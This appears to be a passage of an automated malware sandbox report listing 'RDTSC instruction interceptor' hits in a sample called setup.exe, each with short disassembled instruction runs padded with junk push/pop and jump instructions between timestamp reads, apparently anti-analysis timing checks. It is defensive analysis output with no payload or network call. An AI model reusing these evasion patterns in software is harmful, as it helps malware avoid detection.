Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 420538 second address: 42053C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42067F second address: 420685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 420685 second address: 42068B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42068B second address: 420690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 420690 second address: 420695 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 420695 second address: 4206A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4206A0 second address: 4206CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E48276h 0x00000009 pop esi 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop edx 0x0000000e push edi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop edi 0x00000012 jc 00007F47D8E4826Eh 0x00000018 push esi 0x00000019 pop esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 420837 second address: 42084F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F47D8E3B0B2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42084F second address: 420854 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 420854 second address: 420869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F47D8E3B0ACh 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 420869 second address: 420886 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F47D8E48266h 0x00000008 jc 00007F47D8E48266h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 jns 00007F47D8E48266h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 420886 second address: 420890 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 420890 second address: 4208A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E4826Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4209D2 second address: 4209D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 420B0A second address: 420B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F47D8E48270h 0x0000000d ja 00007F47D8E48266h 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42DC20 second address: 42DC3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jmp 00007F47D8E3B0B6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42DC3D second address: 42DC46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42BD80 second address: 42BDE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F47D8E3B0ABh 0x0000000a jmp 00007F47D8E3B0B3h 0x0000000f popad 0x00000010 jmp 00007F47D8E3B0B5h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push ecx 0x00000019 push edx 0x0000001a pop edx 0x0000001b pop ecx 0x0000001c je 00007F47D8E3B0BFh 0x00000022 jmp 00007F47D8E3B0B9h 0x00000027 jnc 00007F47D8E3B0AEh 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42BF58 second address: 42BF5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42C542 second address: 42C557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 jmp 00007F47D8E3B0AEh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42C557 second address: 42C573 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48276h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42C879 second address: 42C87D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42C87D second address: 42C885 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42CC6A second address: 42CC80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnl 00007F47D8E3B0AEh 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42D366 second address: 42D36B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 441BF2 second address: 441BF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 378650 second address: 378654 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4417BA second address: 4417BF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4417BF second address: 4417C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 447087 second address: 44708B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 44708B second address: 4470AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E48271h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F47D8E48268h 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 446D19 second address: 446D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 446D1D second address: 446D42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F47D8E48274h 0x0000000e jg 00007F47D8E48266h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 446D42 second address: 446D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 446D48 second address: 446D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F47D8E48266h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 44D5B2 second address: 44D5BC instructions: 0x00000000 rdtsc 0x00000002 jno 00007F47D8E3B0A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 453BDD second address: 453BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 453BE8 second address: 453BEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 457668 second address: 457689 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48279h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 457689 second address: 45768D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 459030 second address: 459036 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 45C11F second address: 45C124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 46199C second address: 4619A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4619A2 second address: 4619AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4619AB second address: 4619B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4619B1 second address: 4619B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4619B5 second address: 4619C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F47D8E48266h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4619C1 second address: 4619C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4619C9 second address: 4619CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4619CD second address: 4619D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4619D7 second address: 4619DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4619DD second address: 4619E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 461C69 second address: 461C7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jnc 00007F47D8E48266h 0x0000000d jc 00007F47D8E48266h 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 461DD8 second address: 461DFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F47D8E3B0B4h 0x0000000d ja 00007F47D8E3B0A6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4620DA second address: 462115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push ecx 0x00000008 jmp 00007F47D8E4826Fh 0x0000000d pop ecx 0x0000000e push ecx 0x0000000f jp 00007F47D8E48266h 0x00000015 pop ecx 0x00000016 push ecx 0x00000017 pushad 0x00000018 popad 0x00000019 push edi 0x0000001a pop edi 0x0000001b pop ecx 0x0000001c popad 0x0000001d pushad 0x0000001e jne 00007F47D8E48268h 0x00000024 jnc 00007F47D8E48268h 0x0000002a pushad 0x0000002b popad 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 462B69 second address: 462B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 465D07 second address: 465D12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 465D12 second address: 465D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 465D18 second address: 465D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 46588D second address: 4658A4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F47D8E3B0B1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 46A967 second address: 46A989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push edx 0x0000000a ja 00007F47D8E48266h 0x00000010 pop edx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F47D8E4826Ah 0x00000019 push ebx 0x0000001a pushad 0x0000001b popad 0x0000001c pop ebx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 46A989 second address: 46A990 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 46A7FF second address: 46A81C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E4826Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F47D8E4826Eh 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 46BF46 second address: 46BF4C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 46BF4C second address: 46BF59 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jp 00007F47D8E48266h 0x00000009 pop ecx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4762FA second address: 47630C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47630C second address: 476312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 476312 second address: 47631A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47631A second address: 476340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E48272h 0x00000009 push edx 0x0000000a pop edx 0x0000000b jnc 00007F47D8E48266h 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 476340 second address: 476346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 476346 second address: 47635A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F47D8E48266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jl 00007F47D8E48266h 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 489018 second address: 48901C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48901C second address: 489020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4A20DF second address: 4A20EC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4A20EC second address: 4A20F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4A20F1 second address: 4A210D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c js 00007F47D8E3B0A6h 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 36AF20 second address: 36AF3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E4826Fh 0x00000009 pop ecx 0x0000000a push ebx 0x0000000b jo 00007F47D8E4826Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4A119A second address: 4A11D9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F47D8E3B0C2h 0x00000008 jmp 00007F47D8E3B0B6h 0x0000000d jbe 00007F47D8E3B0A6h 0x00000013 jmp 00007F47D8E3B0B5h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push esi 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4A11D9 second address: 4A11DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4A1479 second address: 4A1490 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E3B0B1h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4A1490 second address: 4A1494 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4A15D6 second address: 4A15DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4A15DE second address: 4A15EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F47D8E48266h 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4A15EF second address: 4A1602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jl 00007F47D8E3B0AEh 0x0000000b jnc 00007F47D8E3B0A6h 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4A1E45 second address: 4A1E4A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4A50A2 second address: 4A50AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4A50AE second address: 4A50B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4A50B2 second address: 4A50F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push edx 0x0000000c jmp 00007F47D8E3B0B3h 0x00000011 pop edx 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push eax 0x00000016 jbe 00007F47D8E3B0A6h 0x0000001c pop eax 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jc 00007F47D8E3B0ACh 0x0000002a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4A6489 second address: 4A648D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4A9FC9 second address: 4A9FCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4A9FCF second address: 4A9FD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4A9FD5 second address: 4A9FDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4A9FDE second address: 4A9FE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F2001E second address: 4F20024 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F20024 second address: 4F20029 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F20029 second address: 4F20076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F47D8E3B0B4h 0x0000000f push eax 0x00000010 jmp 00007F47D8E3B0ABh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007F47D8E3B0B6h 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov di, 3A30h 0x00000024 mov ah, dh 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F10148 second address: 4F1015F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E48272h 0x00000009 popad 0x0000000a rdtsc
